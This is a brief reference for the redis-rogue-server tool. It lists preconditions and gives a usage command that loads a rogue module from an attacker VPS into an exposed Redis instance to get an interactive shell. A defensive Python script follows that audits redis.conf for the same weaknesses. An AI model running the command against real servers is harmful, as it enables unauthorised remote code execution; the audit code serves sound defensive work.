Technique reference: Redis post-exploitation.
Tested against Redis 5.0.9.
- Redis 4.x/5.x with unauthorized access, or you know its auth password.
- Your PC and the target Redis can communicate with each other.
- Compile the `.so` module; reference: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
python3 redis-rogue-server.py --rhost <target address> [--rport <target port>] --lhost <vps address> [--lport <vps port>] [--so <.so filename>] [--rpasswd <redis auth>]
Finally, you will get an interactive shell. Use `exit` to quit and clean up the rhost server, or use Ctrl-C to quit without cleaning up.
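
On the defender's side, the requirements listed above (unauthenticated access, network reachability, a loadable `.so` module) correspond to `redis.conf` settings that can be audited. The following Python code is an added example, not part of redis-rogue-server; `audit_redis_conf`, the finding codes and both sample configs are constructed for illustration, and it assumes the instance is configured through `redis.conf` directives rather than ACLs.

```python
import shlex

# Constructed sample configs (not taken from a real host).
EXPOSED_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is left commented out
"""
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command MODULE ""
"""
LOOPBACK = {"127.0.0.1", "::1"}

def parse_conf(text):
    """Map each directive (lower-cased) to the list of its argument lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = shlex.split(line)
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit_redis_conf(text):
    """Return finding codes for the preconditions listed in the README."""
    conf = parse_conf(text)
    findings = []
    # Unauthenticated access: no non-empty requirepass.
    if not any(a and a[0] for a in conf.get("requirepass", [])):
        findings.append("no-requirepass")
    # Reachability: no bind directive, or a bind to a non-loopback address.
    binds = [addr for a in conf.get("bind", []) for addr in a]
    if not binds or any(addr not in LOOPBACK for addr in binds):
        findings.append("non-loopback-bind")
    if any(a and a[0].lower() == "no" for a in conf.get("protected-mode", [])):
        findings.append("protected-mode-off")
    # Module loading: MODULE is callable unless renamed to the empty string.
    renames = {a[0].upper(): a[1] for a in conf.get("rename-command", []) if len(a) == 2}
    if renames.get("MODULE") != "":
        findings.append("module-command-enabled")
    return findings

if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf))
```

An empty list means none of the listed preconditions is met by the configuration file; it does not cover settings changed at runtime with `CONFIG SET`.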